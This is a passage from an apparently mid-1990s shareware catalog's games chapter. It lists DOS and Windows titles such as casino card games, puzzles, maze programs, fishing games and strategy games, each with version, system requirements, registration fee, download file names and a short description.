600. + + Product: ULTIMATE BACCARAT + Author: Accidental Software, 619-247-2804 + Version: 2.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 545k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products. + Look for: BACRAT.ZIP on BBSs. + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino and gambling school where you + play baccarat with 3 computer characters or with up to 5 other + "human" companions. Access the game statistics, see the game + rules, adjust your mouse, adjust the game speed, and much more. + Use the Tutor to learn the game then go it on your own. Bets + are adjustable from $20 to $500. Relax and learn to play this + game as the dealer talks you through every step. But be ware. + You may never quit playing. + + Chapter 17, "Games" 679 + + + + Product: ULTIMATE BLACKJACK + Author: Accidental Software, 619-247-2804 + Version: 3.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. + Look for: UBJ.ZIP on BBSs. + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino card game and gambling school + where you play solo against the dealer or with up to 4 of 12 + computer characters. Set the number of decks, change the rules + to match any casino, and monitor stats as the game progresses. + A powerful simulation feature lets you test custom strategies! + You can even use two different card counting systems. Novices + will appreciate the slick on-line tutor that suggests the best + moves. But be prepared! This game is addictive. + + + 17.7 Jokes & humor + + Product: Crystal Ball [***] + Humorous computerized psychic. See full description on + page 594. + + Product: Curses! [***] + Author: R.K. West Consulting + Version: 3.1 (05-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CURSE31.ZIP on BBSs; CURSES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A humorous, creative "insult generator" with a different twist. + A single keystroke switches from insults to compliments! + Phrases are randomly generated from your vivid vocabulary. You + control the contents, so the program can generate descriptive + phrases on any subject. + + Chapter 17, "Games" 680 + + + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 434. + + Product: Practical Joke Collection [***] + Three harmless practical jokes for DOS. See full description + on page 684. + + Product: Rev. Lowell's Treasury of Humor + Author: Bardon Data Systems, 510-526-8470 + Version: 1.01 (03-01-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $18.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; LOWELL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 72340,375 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A hyper-indexed Windows 3.1 collection of great anecdotes, + funny stories, zingy one-liners, revealing quotes. Search by + topic, keywords, etc. Print or copy chosen items. Excellent + source material for speakers, writers, toastmasters, ministers! + Or just read page by page for fun! Illustrated in color & B/W. + Collected by Rev. Lowell over his 30-year career as an ordained + minister. "Very high quality material" + + + 17.8 Logic & brain games + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 693. + + Chapter 17, "Games" 681 + + + + Product: AntiC + Author: Cascoly Software, 206-523-6135 + Version: 1.14 (09-01-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; ANTICX.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 6 (multiple files) (or contact + userID 76703,3046 for assistance). + SWREG#: 1708 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A cross between Othello and Life. Each square sends its color + to the neighboring squares in the network. If only one color + comes into a square, it takes that color. If two colors come + in, they cancel and the square assumes the third color. Each + time you change a square, all squares in the pattern are + recalculated and redrawn. change puzzles and display + + + Product: DOC DEFIANT + Author: Just For Me Software, Inc., 810-348-6697 + Version: 1.0 (02-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $12.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + return policy; bonus game levels; all ASP-wide offers (see + page 6). + Look for: DEFIAN10.ZIP on BBSs; DEFIAN.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 71150,1305 for + assistance). + Download size: 251k (about 19 minutes with a 2400 baud modem) + Description: + Can you stop the dastardly Doc Defiant from unleashing his + freeze ray equipped satellite against Earth? To triumph, + you'll have to defeat four of Defiant's henchmen in a board + game requiring logic and strategy. You are the planet's last + defense; don't let everyone down. Suitable for all ages. + + Chapter 17, "Games" 682 + + + + Product: MAZEMAKER for Windows + Author: Custom Real-Time Software, Inc. (CRTS), 201-228-7623 + Version: 2.01 (03-01-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 6-month return + policy; all ASP-wide offers (see page 6). 6-month free + upgrading allowed. + Look for: MAZEMAKR.ZIP on BBSs (call 718-837-3236 to download it + at no charge); MAZMAK.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 72467,1255 for assistance). + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + This program will challenge you with the "Maze of the Day" + which is like a house with 4-6 floors and about 2000 rooms. All + you have to do is find your way through from beginning to end. + If you can do it you are allowed to attempt progressively more + difficult mazes up to the ultimate "maze of the year!" There + are billions (with a B!) of other mazes too; some easy enough + for a young child; some not! A maze lover's dream! + + + Product: Minefield For Everybody + Author: Judah Warshaw, +972-2-830-001 + Version: 1.1 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $5.00 + Registration benefits: lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: MFE110.ZIP on BBSs; MFE110.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A classic minefield game that will run on any DOS system with a + 80x25 display. Supports both mouse and keyboard, has 5 preset + playfields, user definable playfiled size and difficutly, save + and load of games, 43/50 line EGA/VGA support full really big + playfields and more. Great for your old laptop or your friend's + XT! + + + Product: PentaBlox + Puzzle game for Windows. See full description on page 687. + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 688. + + Chapter 17, "Games" 683 + + + + 17.9 Practical jokes + + Product: Practical Joke Collection [***] + Author: R.K. West Consulting + Version: 2.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: PJOKES20.ZIP on BBSs; PJOKES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + THREE PRACTICAL JOKES = HARD AT WORK ties up your computer with + a Very Important (but imaginary) task so you can take a break. + The activity on screen looks too important to be interrupted. + Conceived as a change of pace from practical joke programs that + insult the user, LOVEDOS overwhelms the user with passionate + affection. NAG is for people who need still need (or enjoy) + daily parental supervision. + + + 17.10 Puzzles, mix & match + + Product: AntiC + AntiChaos puzzles. See full description on page 680. + + Product: Cryptik + Author: Cascoly Software, 206-523-6135 + Version: 1.4 (10-02-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; CRYPT.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Jigsaw puzzles too easy? Try Cryptique, the coded game. The + puzzle you choose is encoded to show its major colors, then the + pieces are jumbled. You need to match the colors to restore the + image. Hall of fame for your best scores. Save puzzles, + solution hints, simple mouse interface, and much more! Designed + to use all major SVGA boards in 800 x 600 mode, but also will + work on VGA if needed. All puzzles use original photography. + + Chapter 17, "Games" 684 + + + + Product: MAGIC SQUARES + Author: Randy A. Harris + Version: 1.0.3 (09-14-93) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $5.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 3-month return policy; bonus game + hints. + Look for: MSQU103.ZIP on BBSs; MSQ103.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 70070,432 for + assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Game fanciers will delight in solving the sliding block puzzles + of Magic Squares. You can toy with the 3x3 size, fiddle with + the 4x4 size, and agonize over the 5x5 size. Feeling + frustrated yet? No? Then accept the mental challenge of Magic + Numbers 15. Put on your thinking cap and arrange the 9 blocks + so the the block numbers add up to 15 in each row, column, and + diagonal. You can solve it in 9 moves if you're really clever. + + + Product: MAZE3 + 3D maze/cave creation and exploration game. See full + description on page 690. + + Product: Minefield For Everybody + Classic minefield game, runs on all systems. See full + description on page 682. + + Product: Palette Pleezer + Author: Cascoly Software, 206-523-6135 + Version: 1.25 (04-10-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; PAL.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Think concentration with colors - lots & lots of 'em! Stunning + images from around the world in SuperVGA color! But somehow, + the palette has become jumbled and it's up to you to restore + the image to its original beauty. How many times do you need to + look at the original? Start with 10 colors and work up to 99. + Great memory tester. Hall of fame for your best scores. Save + partly completed games, simple mouse interface. + + Chapter 17, "Games" 685 + + + + Product: PEG + Author: Cascoly Software, 206-523-6135 + Version: 2.06 (09-13-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; PEG.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1705 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + No one really knows when PEG solitaire was invented. Some + stories trace it to prisoners during the French Revolution, but + published descriptions date at least 100 years earlier. Most + likely the game is even older. This presents variations on the + classic peg solitaire with multiple starting positions, and + varying endgames. One of the pleasures of playing the game on + your computer is that you can quickly set up the board to try + different strategies. Ages 8 to 88. + + + Product: PentaBlox + Author: Aquila Software, +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-12.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: PENTA101.ZIP on BBSs. + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A puzzle for Windows based on a series of twelve unique shapes + described as pentominoes by Solomon Golomb. The challenge is to + find as many of the 2,339 unique soultions as possible to the 6 + x 10 puzzle. Each solution can be saved to disk, where the + program automatically checks for identical solutions, and can + be sent to the user's printer. The program features full mouse + and keyboard support with full animation of the moving pieces. + Also included is an optional grid and a moveable SpeedBar. + + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 579. + + Chapter 17, "Games" 686 + + + + Product: Super VGA Puzzle + Author: Cascoly Software, 206-523-6135 + Version: 2.04 (05-14-94) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; PUZ.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 1709 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate puzzle game. Extremely flexible - choose any numbers + of pieces from 4 to 2000! Hall of fame for your best scores. + Save puzzles, solution hints, simple mouse interface, and much + more! Designed to use all major SVGA boards in 800 x 600 mode, + but also will work on VGA or EGA if needed. All puzzles use + original photography. + + + Product: Tangram + Author: Judah Warshaw, +972-2-830-001 + Version: 1.1 (04-15-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on upgrades. + Look for: TANGRM11.ZIP on BBSs; TANGRM.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + SWREG#: 2464 + PsL#: 11293 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The ancient Chinese jigsaw puzzle game. Unlike western jigsaw + puzzles, Tangram puzzles all use the same 7 pieces, from which + hundreds of forms can be created. Can be used for design, + inspiration, unlocking your imagination and just plain fun. + Comes with 50 puzzles to solve, built in screen saver, 360 + degree piece control, 1/4 million color VGA support, save your + own puzzles and more! The endless possibilities have intrigued + people for centuries. Try solving a puzzle or two and see why. + + Chapter 17, "Games" 687 + + + + Product: WINZLE + Author: Cascoly Software, 206-523-6135 + Version: 1.07 (09-28-94) + Needs: IBM PC, DOS 3.1 or better. VGA monitor; Mouse. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; WINZLE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 2958 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate Windows puzzle game. Extremely flexible - choose any + numbers of pieces from 4 to 2000! Hall of fame for your best + scores. Save puzzles, solution hints, simple mouse interface, + and much more! All puzzles use original photography. + + + Product: XFIRE: Action Puzzle game + Author: Cascoly Software, 206-523-6135 + Version: 1.02 (11-30-93) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: EMS memory; XMS memory; sound card. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited phone, CompuServe, + mail support; bonus data; bonus graphics; bonus game hints; + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; XFIRE.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1710 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An action puzzle game: you start with a scrambled version of a + picture with moving pieces. Click on a puzzle piece to set the + crosshairs. Any pieces belonging on those axes, snap into + place. If only 1 piece remains on a row or column it pops into + place, too. Includes SoundBlaster special effects. You get + points for completing the puzzle in the shortest time, and for + completing rows and columns quickly. + + Chapter 17, "Games" 688 + + + + 17.11 Sayings & stories + + Product: Crowndale Tales : ESCAPE! [***] + Author: Crowndale Productions, 713-346-1552 + Version: 1.0 (08-17-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. MCI services installed. + Strongly recommended: SVGA monitor. + Registration fee: $15.00 (add $4.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; bonus data; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: ESCAPE.ZIP on BBSs; ESCAPE.ZIP on CompuServe in + CIS:EFORUM forum LIBrary 0 (or contact userID 72435,40 for + assistance). + SWREG#: 6610 + Download size: 13500k (about 1002 minutes with a 2400 baud modem) + Description: + For the animal in all of us. ESCAPE! is the first tale in a + collection called Crowndale Tales. The tale is sophisticated + enough to appeal to an adult while simple enough in context for + a child. In the story, a wounded and helpless dove faces the + challenge of outwiting a cunning hyena. + + + Product: NETWORK QUOTABLES + Be greeted w/ famous & witty daily quotes. See full + description on page 427. + + Product: PC-Fortune + A no-repetition "fortune cookie" program. See full description + on page 307. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 680. + + + 17.12 Simulators + + Product: MAZE3 + Author: Stiller Research, 904-574-0920 + Version: 3.0.6 (01-19-89) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $12.00 + Registration benefits: 12 months of fax, BBS, CompuServe, GEnie, + mail support; 2-month return policy; bonus utilities; bonus + game hints; all ASP-wide offers (see page 6); disks of other + + Chapter 17, "Games" 689 + + + + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: MAZE306.ZIP on BBSs (call 904-386-8693 to download it + at no charge); MAZ3.EXE on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 72571,3352 for assistance). + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Lets you create a unigue maze of any size and then explore it. + You see realistic 3D views of the interior of the maze. Maze + provides advanced pallete switching graphics for EGA/VGA + adpaters but Maze will even work on non-graphics adapters in a + special character graphics mode. You explore the maze using a + compass and dropping markers to find your way. You may print a + complete map of the maze when you quit or find your way out of + the maze. + + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 607. + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 698. + + 17.12.1 Sports + + Product: Bass Class + Bass fishing game & tutorial. See full description on + page 618. + + Product: BassDuel + One- or two-player fishing game. See full description on + page 619. + + Chapter 17, "Games" 690 + + + + Product: BassMap + Author: Arcanum Computing + Version: 1.3 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: EGA monitor. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: BASSMP13.ZIP on BBSs (call 508-788-6951 to download it + at no charge); BASSMP.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 6 (or contact userID 71020,2613 for assistance). + Download size: 84k (about six minutes with a 2400 baud modem) + Description: + A utility that works with the fishing games BassTour, BassClass + and BassDuel. You can edit any existing lakes or create your + own lakes from scratch. Includes versions for CGA and EGA/VGA + systems. + + + Product: BassTour + Bass fishing tournament game. See full description on + page 620. + + Product: A Day at the Races + A betting horse racing game. See full description on page 696. + + + 17.13 Star Trek & Star Wars + + Product: EGATrek + Author: Arcanum Computing + Version: 3.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. + Look for: EGATRK31.ZIP on BBSs (call 508-788-6951 to download it + at no charge); EGATRK.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1988 winner, Public Brand Software contests for useful + programs. + Description: + A colorful, hi-res version of the classic computer game. The + player is put in control of a powerful starship in a battle to + save the universe. The computer screen simulates the captain's + command console with scanners, messages, damage control and + + Chapter 17, "Games" 691 + + + + even a view outside the ship. Score is based on the time needed + to complete the mission with bonuses for rescues, ships + destroyed, etc. Supports only 640x350 16 color graphics. + + + Product: STARTREK the Computer Program + Author: Software for Amateur Radio, 301-593-6136 + Version: 1.00 (05-25-90) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $15.00 + Registration benefits: Support, free upgrades. + Look for: TREKBOOK.ZIP on BBSs (call 301-593-9067 to download it + at no charge). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + The techniques used in writing a good game are the same that + programmers use in professional activities. Writing a good game + poses a challenge that allows you to develop good habits and + techniques for programming and also allows you to learn a + language in an interesting manner. This product teaches the + techniques for writing such a game using the STARTREK game as + an example, and BASIC as the programming language in which to + write the code. + + + 17.14 Strategy/simulation + + Product: Ancient Yacht + Author: LatticeWork Software + Version: 1.0 (01-06-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $4.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of mail support. 3-month return + policy. + Look for: availability unknown on BBSs; YT.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 12 (or contact userID 74453,2112 for + assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Try it and you'll agree, you've never played yahtzee like this + before. An ancient scroll and stone cup sit on a marble table + waiting for your play. Click on the cup and it shakes, and + spills the dice onto the table where they roll across the + tabletop with accompanying sound effects. This is a dice game + of luck and strategy similar to Yahtzee but based on the + original game of Yacht. Full on-line help, and the option to + turn sound effects on and off. + + Chapter 17, "Games" 692 + + + + Product: ATC: Air Traffic Controller + Author: Cascoly Software, 206-523-6135 + Version: 1.0 (09-29-85) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: ATC.ZIP on BBSs; ATC.ZIP on CompuServe in CIS:IBMNEW + forum LIBrary 6 (or contact userID 76703,3046 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An air traffic controller game that's perfect for a few minutes + or hours of fun. Easy to learn, but difficult to master. The + game tracks best scores at each of 20 levels of difficulty. + Ages 10 and up. + + + Product: BATTLE CHARGE + Author: Cold Water Software, 612-946-1987 + Version: 1.03 (08-02-94) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk; math coprocessor. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: BTC100.ZIP on BBSs; BTC103.ZIP on CompuServe in + CIS:GAMERS forum LIBrary 7 (or contact userID 73423,3415 for + assistance); BTC101.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A two-player strategy game played on a grid with two sets of + opposing (red vs. blue) neutral and charged pieces. A player + moves by choosing an initial velocity for one of his pieces, + which then follows a trajectory influenced (for a charged + piece) by the distribution of other charges on the board. The + motion ends following a collision with another piece. The game + ends when a charged piece captures (collides with) its opposing + king. + + Chapter 17, "Games" 693 + + + + Product: Border + Author: Cascoly Software, 206-523-6135 + Version: 1.1 (02-23-89) + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Registration fee: $20.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: BORDER.ZIP on BBSs; BORDER.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A combination of GO and connect the dots, this abstract + strategy game for 2 players involves enclosing more area than + your opponent, while preventing them from stopping you. Ages 12 + and up. + + + Product: Cell War + Author: Al Funk + Version: 1.0 (12-12-92) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Registration fee: $5.00 + Registration benefits: Free updates. + Look for: CELLWR10.ZIP on BBSs; CELLWR.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 71505,1277 for + assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A game based on the growth of one-celled organisms in a + culture. A familiar computer simulation, this is actually a + two-player game. Each turn involves introducing a new cell + into the culture and thereby influencing the growth of cells in + the environment. Play against the computer or a friend. Dumb + or smart computer levels, configurable board-size. + + Chapter 17, "Games" 694 + + + + Product: COLOR CROSS + Author: Cold Water Software, 612-946-1987 + Version: 1.04 (08-02-94) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + 3-month return policy. Lifetime free upgrading allowed. + Look for: CLRX1.ZIP on BBSs (call 701-772-5399 to download it at + no charge); CLX104.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 73423,3415 for assistance); + CLX102.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A unique, abstract and kinetic two-player strategy game played + on a grid of gray and colored terrain squares. On a given turn, + a player sets a sequence of up to four pieces in motion, which + interact with existing terrain and modify it by leaving colored + trails. Collisions between pieces cause opposing pieces to + freeze and allied pieces to thaw (if frozen) and move. The game + ends when all of one player's pieces are frozen. Players may + edit and save any existing board configuration. + + + Product: A Day at the Races + Author: LatticeWork Software + Version: 1.1 (10-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of CompuServe, mail support; + 3-month limited return policy. + Look for: availability unknown on BBSs; HORSE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 74453,2112 for + assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Test your betting skills and luck on an exciting animated horse + racing game for up to four players. Choose one of eight horses + to win, place or show, based on posted odds which influence the + horses' performances. Create your own voice overlays and hear + yourself introduce the races. Also included are a full on-line + help, the option to toggle voices on and off, and to change the + speed of the race. + + + Product: The Deer Expert + Gives methods for whitetail deer hunting,logs. See full + description on page 620. + + Chapter 17, "Games" 695 + + + + Product: Ecomaster + Ecology simulation for 1 or 2 players. See full description on + page 542. + + Product: Econ's Arena + Fantasy chess-like strategy game. See full description on + page 669. + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 621. + + Product: GREEN + Author: Cascoly Software, 206-523-6135 + Version: 1.11 (05-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GREENX.ZIP on CompuServe + in CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 358 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Help the planters as they work to prevent the pavers from + turning farms into parking lots. Pavers include mall + developers, real estate agents, clear-cut loggers and other + exploiters. There are several different maps, of varying + difficulty. You have the ability to plant hedges, add walls, + and to destroy pavement. Unique, yet similar in concept to + Populous and 